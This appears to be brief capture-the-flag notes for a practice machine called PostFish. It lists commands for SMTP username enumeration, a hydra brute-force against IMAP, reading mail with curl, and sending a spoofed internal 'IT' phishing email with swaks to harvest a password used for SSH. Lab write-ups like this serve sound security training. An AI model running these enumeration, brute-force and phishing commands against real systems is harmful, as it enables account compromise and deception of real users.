143

smtp-user-enum -M VRFY -U users.txt -t 192.168.208.137
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 192.168.208.137
hydra -L users.txt -P users.txt imap://192.168.245.137

Now checking messages:

curl -k 'imaps://192.168.245.137/INBOX;MAILINDEX=1' --user sales:sales
sudo swaks -t Brian.Moore@postfish.off --from it@postfish.off --server 192.168.245.137 -body @body.txt -header "Subject:Problems"

Using this password we can login through ssh at port [[PG Practice/PostFish/22]]

Last updated